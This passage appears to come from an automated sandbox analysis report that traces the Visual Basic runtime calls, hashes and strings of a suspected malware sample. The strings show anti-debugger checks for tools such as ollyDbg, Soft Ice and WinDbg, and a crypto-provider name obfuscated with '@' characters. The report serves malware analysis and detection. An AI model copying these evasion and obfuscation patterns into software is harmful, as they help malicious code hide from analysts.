                                                                    • __vbaStrCat.MSVBVM60(0040AB98,00000000,0040AC20,00000000,0040A1D0,00000000,0040A1D0,0040AC18,?,?,00000000,?,?,?,?,00000041), ref: 0054E0BC
                                                                    • __vbaStrMove.MSVBVM60(0040AB98,00000000,0040AC20,00000000,0040A1D0,00000000,0040A1D0,0040AC18,?,?,00000000,?,?,?,?,00000041), ref: 0054E0C6
                                                                    • __vbaStrCat.MSVBVM60(0040ABA0,00000000,0040AB98,00000000,0040AC20,00000000,0040A1D0,00000000,0040A1D0,0040AC18,?,?,00000000,?,?,?), ref: 0054E0D1
                                                                    • __vbaVarZero.MSVBVM60(0040ABA0,00000000,0040AB98,00000000,0040AC20,00000000,0040A1D0,00000000,0040A1D0,0040AC18,?,?,00000000,?,?,?), ref: 0054E106
                                                                    • __vbaVarCopy.MSVBVM60(0040ABA0,00000000,0040AB98,00000000,0040AC20,00000000,0040A1D0,00000000,0040A1D0,0040AC18,?,?,00000000,?,?,?), ref: 0054E13F
                                                                    • __vbaVarCopy.MSVBVM60(0040ABA0,00000000,0040AB98,00000000,0040AC20,00000000,0040A1D0,00000000,0040A1D0,0040AC18,?,?,00000000,?,?,?), ref: 0054E178
                                                                    • __vbaVarCopy.MSVBVM60(0040ABA0,00000000,0040AB98,00000000,0040AC20,00000000,0040A1D0,00000000,0040A1D0,0040AC18,?,?,00000000,?,?,?), ref: 0054E1B1
                                                                    • #601.MSVBVM60(?,?,0040ABA0,00000000,0040AB98,00000000,0040AC20,00000000,0040A1D0,00000000,0040A1D0,0040AC18,?,?,00000000,?), ref: 0054E1C4
                                                                    • __vbaErase.MSVBVM60(00000000,?,?,?,0040ABA0,00000000,0040AB98,00000000,0040AC20,00000000,0040A1D0,00000000,0040A1D0,0040AC18,?,?), ref: 0054E1D2
                                                                    • __vbaAryVar.MSVBVM60(0000200C,?,00000000,?,?,?,0040ABA0,00000000,0040AB98,00000000,0040AC20,00000000,0040A1D0,00000000,0040A1D0,0040AC18), ref: 0054E1E3
                                                                    • __vbaAryCopy.MSVBVM60(?,?,0000200C,?,00000000,?,?,?,0040ABA0,00000000,0040AB98,00000000,0040AC20,00000000,0040A1D0,00000000), ref: 0054E1F9
                                                                    • __vbaFreeStrList.MSVBVM60(0000000C,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000200C), ref: 0054E230
                                                                    • __vbaFreeVarList.MSVBVM60(00000005,?,?,?,?,?), ref: 0054E254
                                                                    • __vbaStrVarVal.MSVBVM60(?,?), ref: 0054E2AB
                                                                    • #644.MSVBVM60(00000000,?,?), ref: 0054E2B1
                                                                    • #644.MSVBVM60(00000000,00000000,?,?), ref: 0054E2BE
                                                                    • __vbaSetSystemError.MSVBVM60(?,00000000,00000000,00000000,?,?), ref: 0054E2D5
                                                                    • __vbaFreeStr.MSVBVM60(?,00000000,00000000,00000000,?,?), ref: 0054E2F2
                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?,0054E3AB), ref: 0054E3A5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1338899926.000000000040B000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1338841597.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                    • Associated: 00000004.00000002.1338861845.0000000000401000.00000020.00000001.01000000.00000004.sdmp
                                                                    • Associated: 00000004.00000002.1338885898.000000000040A000.00000040.00000001.01000000.00000004.sdmp
                                                                    • Associated: 00000004.00000002.1339003333.000000000057E000.00000002.00000001.01000000.00000004.sdmp
                                                                    • Associated: 00000004.00000002.1339017269.000000000057F000.00000004.00000001.01000000.00000004.sdmp
                                                                    • Associated: 00000004.00000002.1339017269.0000000000581000.00000004.00000001.01000000.00000004.sdmp
                                                                    • Associated: 00000004.00000002.1339045246.0000000000583000.00000002.00000001.01000000.00000004.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$Move$Copy$Zero$#698Free$#644List$#601ChkstkDestructEraseErrorRedimSystem
                                                                    • String ID: (W$ObsidianGUI$Rock Debugger$Soft Ice$WinDbgFrameClass$WindDbg$Zeta Debugger$ollyDbg
                                                                    • API String ID: 965276749-4266984186
                                                                    • Opcode ID: 0bd795aa534cc1f2e85e50ffcc6169e215c1c6e7aeac8c94371ca5ce6801286a
                                                                    • Instruction ID: 43b833a18e47caea910ad6117162663c4401d64ac9d9e99559d3597631243f42
                                                                    • Opcode Fuzzy Hash: 0bd795aa534cc1f2e85e50ffcc6169e215c1c6e7aeac8c94371ca5ce6801286a
                                                                    • Instruction Fuzzy Hash: 29F112719002589BDB18DBA4CC45FEE77B8BF08344F1045AAF605BB291DB78AA84CF55
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401006), ref: 0055325E
                                                                    • __vbaNew2.MSVBVM60(0040B19C,0057FB40,?,?,?,?,00401006), ref: 0055329F
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B18C,00000014), ref: 005532EC
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B960,00000058), ref: 0055332D
                                                                    • __vbaChkstk.MSVBVM60(00000000,?,0040B960,00000058), ref: 00553352
                                                                    • #689.MSVBVM60(?,Options,Show Tips at Startup), ref: 0055336D
                                                                    • __vbaStrMove.MSVBVM60(?,Options,Show Tips at Startup), ref: 00553377
                                                                    • __vbaI4Str.MSVBVM60(00000000,?,Options,Show Tips at Startup), ref: 0055337D
                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?,00000000,?,Options,Show Tips at Startup), ref: 0055338F
                                                                    • __vbaFreeObj.MSVBVM60(?,?,00401006), ref: 0055339A
                                                                    • __vbaNew2.MSVBVM60(0040B19C,0057FB40), ref: 005533BC
                                                                    • __vbaObjSetAddref.MSVBVM60(?,0057E468), ref: 005533E9
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B18C,00000010), ref: 00553412
                                                                    • __vbaFreeObj.MSVBVM60(00000000,?,0040B18C,00000010), ref: 00553429
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1338899926.000000000040B000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1338841597.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                    • Associated: 00000004.00000002.1338861845.0000000000401000.00000020.00000001.01000000.00000004.sdmp
                                                                    • Associated: 00000004.00000002.1338885898.000000000040A000.00000040.00000001.01000000.00000004.sdmp
                                                                    • Associated: 00000004.00000002.1339003333.000000000057E000.00000002.00000001.01000000.00000004.sdmp
                                                                    • Associated: 00000004.00000002.1339017269.000000000057F000.00000004.00000001.01000000.00000004.sdmp
                                                                    • Associated: 00000004.00000002.1339017269.0000000000581000.00000004.00000001.01000000.00000004.sdmp
                                                                    • Associated: 00000004.00000002.1339045246.0000000000583000.00000002.00000001.01000000.00000004.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$CheckFreeHresult$ChkstkNew2$#689AddrefListMove
                                                                    • String ID: file was not found? $ using NotePad with 1 tip per line. $Create a text file named $Options$Show Tips at Startup$That the $Then place it in the same directory as the application. $hW$hW
                                                                    • API String ID: 481385995-4225297203
                                                                    • Opcode ID: 3576d6cdde44d285bdecc183007a296bcd05239b3c329f6d04b8cb3a7dff0b85
                                                                    • Instruction ID: 5e4e99fb6c1ced7cd825e54d8eb7403a416cc1bd3b72b80154bb296a3372dd30
                                                                    • Opcode Fuzzy Hash: 3576d6cdde44d285bdecc183007a296bcd05239b3c329f6d04b8cb3a7dff0b85
                                                                    • Instruction Fuzzy Hash: F5F10471E00208AFDB15EFA0C856BEDBBB5BF08345F20406AF509BB1A1DB785A48DB54
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401006), ref: 0054F623
                                                                    • __vbaNew2.MSVBVM60(0040B19C,0057FB40,?,?,?,?,00401006), ref: 0054F664
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B18C,00000014), ref: 0054F6B1
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B960,00000060), ref: 0054F6F2
                                                                    • __vbaStrCat.MSVBVM60(?,Info zu ), ref: 0054F70E
                                                                    • __vbaStrMove.MSVBVM60(?,Info zu ), ref: 0054F718
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,0057E3B8,0040BB84,00000054), ref: 0054F741
                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0054F75F
                                                                    • __vbaFreeObj.MSVBVM60(?,?,00401006), ref: 0054F76A
                                                                    • __vbaObjSet.MSVBVM60(?,00000000,?,?,00401006), ref: 0054F782
                                                                    • __vbaNew2.MSVBVM60(0040B19C,0057FB40,?,00000000,?,?,00401006), ref: 0054F7A0
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B18C,00000014), ref: 0054F7ED
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B960,000000B8), ref: 0054F834
                                                                    • __vbaNew2.MSVBVM60(0040B19C,0057FB40), ref: 0054F85B
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B18C,00000014), ref: 0054F8A8
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B960,000000C0), ref: 0054F8EF
                                                                    • __vbaNew2.MSVBVM60(0040B19C,0057FB40), ref: 0054F916
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B18C,00000014), ref: 0054F963
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B960,000000C8), ref: 0054F9AA
                                                                    • __vbaStrI2.MSVBVM60(?,Version ), ref: 0054F9C6
                                                                    • __vbaStrMove.MSVBVM60(?,Version ), ref: 0054F9D0
                                                                    • __vbaStrCat.MSVBVM60(00000000,?,Version ), ref: 0054F9D6
                                                                    • __vbaStrMove.MSVBVM60(00000000,?,Version ), ref: 0054F9E0
                                                                    • __vbaStrCat.MSVBVM60(0040BD54,00000000,00000000,?,Version ), ref: 0054F9EB
                                                                    • __vbaStrMove.MSVBVM60(0040BD54,00000000,00000000,?,Version ), ref: 0054F9F5
                                                                    • __vbaStrI2.MSVBVM60(?,00000000,0040BD54,00000000,00000000,?,Version ), ref: 0054F9FE
                                                                    • __vbaStrMove.MSVBVM60(?,00000000,0040BD54,00000000,00000000,?,Version ), ref: 0054FA08
                                                                    • __vbaStrCat.MSVBVM60(00000000,?,00000000,0040BD54,00000000,00000000,?,Version ), ref: 0054FA0E
                                                                    • __vbaStrMove.MSVBVM60(00000000,?,00000000,0040BD54,00000000,00000000,?,Version ), ref: 0054FA18
                                                                    • __vbaStrCat.MSVBVM60(0040BD54,00000000,00000000,?,00000000,0040BD54,00000000,00000000,?,Version ), ref: 0054FA23
                                                                    • __vbaStrMove.MSVBVM60(0040BD54,00000000,00000000,?,00000000,0040BD54,00000000,00000000,?,Version ), ref: 0054FA2D
                                                                    • __vbaStrI2.MSVBVM60(?,00000000,0040BD54,00000000,00000000,?,00000000,0040BD54,00000000,00000000,?,Version ), ref: 0054FA36
                                                                    • __vbaStrMove.MSVBVM60(?,00000000,0040BD54,00000000,00000000,?,00000000,0040BD54,00000000,00000000,?,Version ), ref: 0054FA40
                                                                    • __vbaStrCat.MSVBVM60(00000000,?,00000000,0040BD54,00000000,00000000,?,00000000,0040BD54,00000000,00000000,?,Version ), ref: 0054FA46
                                                                    • __vbaStrMove.MSVBVM60(00000000,?,00000000,0040BD54,00000000,00000000,?,00000000,0040BD54,00000000,00000000,?,Version ), ref: 0054FA50
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040BB18,00000054), ref: 0054FA8B
                                                                    • __vbaFreeStrList.MSVBVM60(00000008,?,00000000,?,?,?,?,?,?), ref: 0054FAC1
                                                                    • __vbaFreeObjList.MSVBVM60(00000004,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0054FADB
                                                                    • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0054FAF6
                                                                    • __vbaNew2.MSVBVM60(0040B19C,0057FB40,?,00000000), ref: 0054FB11
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040B18C,00000014), ref: 0054FB5E
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B960,00000060), ref: 0054FB9F
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040BB18,00000054), ref: 0054FBD9
                                                                    • __vbaFreeStr.MSVBVM60(00000000,?,0040BB18,00000054), ref: 0054FBF0
                                                                    • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0054FBFF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1338899926.000000000040B000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1338841597.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                    • Associated: 00000004.00000002.1338861845.0000000000401000.00000020.00000001.01000000.00000004.sdmp
                                                                    • Associated: 00000004.00000002.1338885898.000000000040A000.00000040.00000001.01000000.00000004.sdmp
                                                                    • Associated: 00000004.00000002.1339003333.000000000057E000.00000002.00000001.01000000.00000004.sdmp
                                                                    • Associated: 00000004.00000002.1339017269.000000000057F000.00000004.00000001.01000000.00000004.sdmp
                                                                    • Associated: 00000004.00000002.1339017269.0000000000581000.00000004.00000001.01000000.00000004.sdmp
                                                                    • Associated: 00000004.00000002.1339045246.0000000000583000.00000002.00000001.01000000.00000004.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$CheckHresult$Move$Free$New2$List$Chkstk
                                                                    • String ID: Info zu $Version
                                                                    • API String ID: 2866532796-1133326459
                                                                    • Opcode ID: c56cc79b7d290f24b6fe01613f70d92bf3193ddc098c51638a488e2d4b1df85b
                                                                    • Instruction ID: ecaebf5ccedca865251d21b8f58959b9c2353d88645e05ae6b1eb67f6fc6ecc4
                                                                    • Opcode Fuzzy Hash: c56cc79b7d290f24b6fe01613f70d92bf3193ddc098c51638a488e2d4b1df85b
                                                                    • Instruction Fuzzy Hash: 8912D171D00218AFDB11EFA4CD49BDDBBB5FB09308F1040BAE109BB2A1DB745A899F54
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401006), ref: 0054FFBD
                                                                    • __vbaStrToAnsi.MSVBVM60(?,00401006,00000000,0002003F,?,?,?,?,?,00401006), ref: 0054FFF5
                                                                    • __vbaSetSystemError.MSVBVM60(?,00000000,?,00401006,00000000,0002003F,?,?,?,?,?,00401006), ref: 0055000B
                                                                    • __vbaStrToUnicode.MSVBVM60(00401006,00000000,?,00000000,?,00401006,00000000,0002003F,?,?,?,?,?,00401006), ref: 00550016
                                                                    • __vbaFreeStr.MSVBVM60(00401006,00000000,?,00000000,?,00401006,00000000,0002003F,?,?,?,?,?,00401006), ref: 00550027
                                                                    • #606.MSVBVM60(00000400,00000002), ref: 0055004B
                                                                    • __vbaStrMove.MSVBVM60(00000400,00000002), ref: 00550055
                                                                    • __vbaFreeVar.MSVBVM60(00000400,00000002), ref: 0055005D
                                                                    • __vbaStrToAnsi.MSVBVM60(?,00401006,00000400,00000400,00000002), ref: 00550074
                                                                    • __vbaStrToAnsi.MSVBVM60(00000000,?,00000000,?,00000000,?,00401006,00000400,00000400,00000002), ref: 00550089
                                                                    • __vbaSetSystemError.MSVBVM60(?,00000000,00000000,?,00000000,?,00000000,?,00401006,00000400,00000400,00000002), ref: 0055009D
                                                                    • __vbaStrToUnicode.MSVBVM60(?,00000000,?,00000000,00000000,?,00000000,?,00000000,?,00401006,00000400,00000400,00000002), ref: 005500A8
                                                                    • __vbaStrToUnicode.MSVBVM60(00401006,?,?,00000000,?,00000000,00000000,?,00000000,?,00000000,?,00401006,00000400,00000400,00000002), ref: 005500B4
                                                                    • __vbaFreeStrList.MSVBVM60(00000002,00000000,?,00401006,?,?,00000000,?,00000000,00000000,?,00000000,?,00000000,?,00401006), ref: 005500CC
                                                                    • __vbaStrCopy.MSVBVM60(00401006,00000000,?,00000000,?,00401006,00000000,0002003F,?), ref: 005503A5
                                                                    • __vbaSetSystemError.MSVBVM60(?), ref: 005503BD
                                                                    • __vbaFreeStr.MSVBVM60(0055040F,?), ref: 00550409
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1338899926.000000000040B000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                     • Associated: 00000004.00000002.1338841597.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                     • Associated: 00000004.00000002.1338861845.0000000000401000.00000020.00000001.01000000.00000004.sdmp
                                                                     • Associated: 00000004.00000002.1338885898.000000000040A000.00000040.00000001.01000000.00000004.sdmp
                                                                     • Associated: 00000004.00000002.1339003333.000000000057E000.00000002.00000001.01000000.00000004.sdmp
                                                                     • Associated: 00000004.00000002.1339017269.000000000057F000.00000004.00000001.01000000.00000004.sdmp
                                                                     • Associated: 00000004.00000002.1339017269.0000000000581000.00000004.00000001.01000000.00000004.sdmp
                                                                     • Associated: 00000004.00000002.1339045246.0000000000583000.00000002.00000001.01000000.00000004.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$Free$AnsiErrorSystemUnicode$#606ChkstkCopyListMove
                                                                    • String ID:
                                                                    • API String ID: 3225542645-0
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401006), ref: 005507BA
                                                                    • __vbaStrCat.MSVBVM60(@o@s@o@f,M@i@c@r,?,?,?,?,00401006), ref: 005507EE
                                                                    • __vbaStrMove.MSVBVM60(@o@s@o@f,M@i@c@r,?,?,?,?,00401006), ref: 005507F8
                                                                    • __vbaStrCat.MSVBVM60(@t@ @E@n@h@a@n,00000000,@o@s@o@f,M@i@c@r,?,?,?,?,00401006), ref: 00550803
                                                                    • __vbaStrMove.MSVBVM60(@t@ @E@n@h@a@n,00000000,@o@s@o@f,M@i@c@r,?,?,?,?,00401006), ref: 0055080D
                                                                    • __vbaStrCat.MSVBVM60(@c@e@d@ @R@S@,00000000,@t@ @E@n@h@a@n,00000000,@o@s@o@f,M@i@c@r,?,?,?,?,00401006), ref: 00550818
                                                                    • __vbaStrMove.MSVBVM60(@c@e@d@ @R@S@,00000000,@t@ @E@n@h@a@n,00000000,@o@s@o@f,M@i@c@r,?,?,?,?,00401006), ref: 00550822
                                                                    • __vbaStrCat.MSVBVM60(A@ @a@n,00000000,@c@e@d@ @R@S@,00000000,@t@ @E@n@h@a@n,00000000,@o@s@o@f,M@i@c@r,?,?,?,?,00401006), ref: 0055082D
                                                                    • __vbaStrMove.MSVBVM60(A@ @a@n,00000000,@c@e@d@ @R@S@,00000000,@t@ @E@n@h@a@n,00000000,@o@s@o@f,M@i@c@r,?,?,?,?,00401006), ref: 00550837
                                                                    • __vbaStrCat.MSVBVM60(@d@ @A@E@S@ ,00000000,A@ @a@n,00000000,@c@e@d@ @R@S@,00000000,@t@ @E@n@h@a@n,00000000,@o@s@o@f,M@i@c@r,?,?,?,?,00401006), ref: 00550842
                                                                    • __vbaStrMove.MSVBVM60(@d@ @A@E@S@ ,00000000,A@ @a@n,00000000,@c@e@d@ @R@S@,00000000,@t@ @E@n@h@a@n,00000000,@o@s@o@f,M@i@c@r,?,?,?,?,00401006), ref: 0055084C
                                                                    • __vbaStrCat.MSVBVM60(@C@r@y@,00000000,@d@ @A@E@S@ ,00000000,A@ @a@n,00000000,@c@e@d@ @R@S@,00000000,@t@ @E@n@h@a@n,00000000,@o@s@o@f,M@i@c@r), ref: 00550857
                                                                    • __vbaStrMove.MSVBVM60(@C@r@y@,00000000,@d@ @A@E@S@ ,00000000,A@ @a@n,00000000,@c@e@d@ @R@S@,00000000,@t@ @E@n@h@a@n,00000000,@o@s@o@f,M@i@c@r), ref: 00550861
                                                                    • __vbaStrCat.MSVBVM60(p@t@o@g@r@a@,00000000,@C@r@y@,00000000,@d@ @A@E@S@ ,00000000,A@ @a@n,00000000,@c@e@d@ @R@S@,00000000,@t@ @E@n@h@a@n,00000000,@o@s@o@f,M@i@c@r), ref: 0055086C
                                                                    • __vbaStrMove.MSVBVM60(p@t@o@g@r@a@,00000000,@C@r@y@,00000000,@d@ @A@E@S@ ,00000000,A@ @a@n,00000000,@c@e@d@ @R@S@,00000000,@t@ @E@n@h@a@n,00000000,@o@s@o@f,M@i@c@r), ref: 00550876
                                                                    • __vbaStrCat.MSVBVM60(p@h@i@c@ @P@r,00000000,p@t@o@g@r@a@,00000000,@C@r@y@,00000000,@d@ @A@E@S@ ,00000000,A@ @a@n,00000000,@c@e@d@ @R@S@,00000000,@t@ @E@n@h@a@n,00000000,@o@s@o@f,M@i@c@r), ref: 00550881
                                                                    • __vbaStrMove.MSVBVM60(p@h@i@c@ @P@r,00000000,p@t@o@g@r@a@,00000000,@C@r@y@,00000000,@d@ @A@E@S@ ,00000000,A@ @a@n,00000000,@c@e@d@ @R@S@,00000000,@t@ @E@n@h@a@n,00000000,@o@s@o@f,M@i@c@r), ref: 0055088B
                                                                    • __vbaStrCat.MSVBVM60(@o@v@i@d,00000000,p@h@i@c@ @P@r,00000000,p@t@o@g@r@a@,00000000,@C@r@y@,00000000,@d@ @A@E@S@ ,00000000,A@ @a@n,00000000,@c@e@d@ @R@S@,00000000,@t@ @E@n@h@a@n,00000000), ref: 00550896
                                                                    • __vbaStrMove.MSVBVM60(@o@v@i@d,00000000,p@h@i@c@ @P@r,00000000,p@t@o@g@r@a@,00000000,@C@r@y@,00000000,@d@ @A@E@S@ ,00000000,A@ @a@n,00000000,@c@e@d@ @R@S@,00000000,@t@ @E@n@h@a@n,00000000), ref: 005508A0
                                                                    • __vbaStrCat.MSVBVM60(@e@r@,00000000,@o@v@i@d,00000000,p@h@i@c@ @P@r,00000000,p@t@o@g@r@a@,00000000,@C@r@y@,00000000,@d@ @A@E@S@ ,00000000,A@ @a@n,00000000,@c@e@d@ @R@S@,00000000), ref: 005508AB
                                                                    • __vbaChkstk.MSVBVM60(@e@r@,00000000,@o@v@i@d,00000000,p@h@i@c@ @P@r,00000000,p@t@o@g@r@a@,00000000,@C@r@y@), ref: 005508BD
                                                                      • Part of subcall function 0054ED1F: __vbaChkstk.MSVBVM60(?,00401006), ref: 0054ED3B
                                                                      • Part of subcall function 0054ED1F: __vbaVarDup.MSVBVM60(?,00000008,?,?,00401006), ref: 0054ED53
                                                                      • Part of subcall function 0054ED1F: #653.MSVBVM60(?,?,?,00000008,?,?,00401006), ref: 0054ED60
                                                                      • Part of subcall function 0054ED1F: __vbaI4Var.MSVBVM60(?,?,?,?,00000008,?,?,00401006), ref: 0054ED69
                                                                      • Part of subcall function 0054ED1F: __vbaFreeVar.MSVBVM60 ref: 0054ED82
                                                                      • Part of subcall function 0054ED1F: #632.MSVBVM60(?,?,00000001,00000002), ref: 0054EDB7
                                                                      • Part of subcall function 0054ED1F: __vbaVarCat.MSVBVM60(?,?,?,?,?,00000001,00000002), ref: 0054EDC8
                                                                      • Part of subcall function 0054ED1F: __vbaVarMove.MSVBVM60(?,?,?,?,?,00000001,00000002), ref: 0054EDD2
                                                                      • Part of subcall function 0054ED1F: __vbaFreeVarList.MSVBVM60(00000002,00000002,?,?,?,?,?,?,00000001,00000002), ref: 0054EDE1
                                                                      • Part of subcall function 0054ED1F: __vbaFreeVar.MSVBVM60(0054EE24), ref: 0054EE1E
                                                                    • __vbaStrVarMove.MSVBVM60(00000000,00000000,@e@r@,00000000,@o@v@i@d,00000000,p@h@i@c@ @P@r,00000000,p@t@o@g@r@a@,00000000,@C@r@y@), ref: 005508D8
                                                                    • __vbaStrMove.MSVBVM60(00000000,00000000,@e@r@,00000000,@o@v@i@d,00000000,p@h@i@c@ @P@r,00000000,p@t@o@g@r@a@,00000000,@C@r@y@), ref: 005508E2
                                                                    • __vbaFreeStrList.MSVBVM60(00000009,?,?,?,?,00000000,?,00000000,?,00000000,00000000,00000000,@e@r@,00000000,@o@v@i@d,00000000), ref: 0055090D
                                                                    • __vbaFreeVarList.MSVBVM60(00000002,?,?,00000000,@t@ @E@n@h@a@n,00000000,@o@s@o@f,M@i@c@r,?,?,?,?,00401006), ref: 0055091F
                                                                    Similarity
                                                                    • API ID: __vba$Move$Free$ChkstkList$#632#653
                                                                    • String ID: @C@r@y@$@c@e@d@ @R@S@$@d@ @A@E@S@ $@e@r@$@o@s@o@f$@o@v@i@d$@t@ @E@n@h@a@n$A@ @a@n$M@i@c@r$p@h@i@c@ @P@r$p@t@o@g@r@a@
                                                                    • API String ID: 4029463932-3817434718
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401006), ref: 0054FC98
                                                                    • __vbaOnError.MSVBVM60(00000001,?,?,?,?,00401006), ref: 0054FCC5
                                                                    • __vbaStrCopy.MSVBVM60(00000001,?,?,?,?,00401006), ref: 0054FCD2
                                                                    • __vbaStrCopy.MSVBVM60(00000001,?,?,?,?,00401006), ref: 0054FCDF
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040BBB4,000006FC), ref: 0054FD38
                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,00000001), ref: 0054FD64
                                                                    • __vbaStrCopy.MSVBVM60(?,?,00401006), ref: 0054FD84
                                                                    • __vbaStrCopy.MSVBVM60(?,?,00401006), ref: 0054FD91
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040BBB4,000006FC), ref: 0054FDEA
                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0054FE16
                                                                    • __vbaStrCat.MSVBVM60(\MSINFO32.EXE,?,?,?,?,?,?,00401006), ref: 0054FE31
                                                                    • #645.MSVBVM60(00000008,00000000), ref: 0054FE46
                                                                    • __vbaStrMove.MSVBVM60(00000008,00000000), ref: 0054FE50
                                                                    • __vbaStrCmp.MSVBVM60(0040A6F0,00000000,00000008,00000000), ref: 0054FE5B
                                                                    • __vbaFreeStr.MSVBVM60(0040A6F0,00000000,00000008,00000000), ref: 0054FE72
                                                                    • __vbaFreeVar.MSVBVM60(0040A6F0,00000000,00000008,00000000), ref: 0054FE7A
                                                                    • __vbaStrCat.MSVBVM60(\MSINFO32.EXE,?,0040A6F0,00000000,00000008,00000000), ref: 0054FE92
                                                                    • __vbaStrMove.MSVBVM60(\MSINFO32.EXE,?,0040A6F0,00000000,00000008,00000000), ref: 0054FE9C
                                                                    • #600.MSVBVM60(00004008,00000001,?,?,?,?,?,?,?,?,?,?,\MSINFO32.EXE,?,0040A6F0,00000000), ref: 0054FEBC
                                                                    • __vbaVarDup.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,0040A6F0,00000000,00000008,00000000), ref: 0054FF07
                                                                    • #595.MSVBVM60(?,00000000,0000000A,0000000A,0000000A), ref: 0054FF1E
                                                                    • __vbaFreeVarList.MSVBVM60(00000004,?,0000000A,0000000A,0000000A,?,00000000,0000000A,0000000A,0000000A), ref: 0054FF35
                                                                    • __vbaExitProc.MSVBVM60(?,?,?,?,?,?,?,?,?,?,00401006), ref: 0054FF3D
                                                                    • __vbaFreeStr.MSVBVM60(0054FF80,?,?,?,?,?,?,?,?,?,?,00401006), ref: 0054FF7A
                                                                    Similarity
                                                                    • API ID: __vba$Free$Copy$List$CheckHresultMove$#595#600#645ChkstkErrorExitProc
                                                                    • String ID: MSINFO$PATH$SOFTWARE\Microsoft\Shared Tools Location$SOFTWARE\Microsoft\Shared Tools\MSINFO$Systeminformation are not available!$\MSINFO32.EXE
                                                                    • API String ID: 2627723877-2418805842
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401006), ref: 005509C5
                                                                    • __vbaStrCat.MSVBVM60(0040AF4C,0040AF3C,?,?,?,?,00401006), ref: 005509F9
                                                                    • __vbaStrMove.MSVBVM60(0040AF4C,0040AF3C,?,?,?,?,00401006), ref: 00550A03
                                                                    • __vbaStrCat.MSVBVM60(0040ACD0,00000000,0040AF4C,0040AF3C,?,?,?,?,00401006), ref: 00550A0E
                                                                    • __vbaStrMove.MSVBVM60(0040ACD0,00000000,0040AF4C,0040AF3C,?,?,?,?,00401006), ref: 00550A18
                                                                    • __vbaStrCat.MSVBVM60(0040AE60,00000000,0040ACD0,00000000,0040AF4C,0040AF3C,?,?,?,?,00401006), ref: 00550A23
                                                                    • __vbaStrMove.MSVBVM60(0040AE60,00000000,0040ACD0,00000000,0040AF4C,0040AF3C,?,?,?,?,00401006), ref: 00550A2D
                                                                    • __vbaStrCat.MSVBVM60(0040AD3C,00000000,0040AE60,00000000,0040ACD0,00000000,0040AF4C,0040AF3C,?,?,?,?,00401006), ref: 00550A38
                                                                    • __vbaStrMove.MSVBVM60(0040AD3C,00000000,0040AE60,00000000,0040ACD0,00000000,0040AF4C,0040AF3C,?,?,?,?,00401006), ref: 00550A42
                                                                    • __vbaStrCat.MSVBVM60(0040B3AC,00000000,0040AD3C,00000000,0040AE60,00000000,0040ACD0,00000000,0040AF4C,0040AF3C,?,?,?,?,00401006), ref: 00550A4D
                                                                    • __vbaStrMove.MSVBVM60(0040B3AC,00000000,0040AD3C,00000000,0040AE60,00000000,0040ACD0,00000000,0040AF4C,0040AF3C,?,?,?,?,00401006), ref: 00550A57
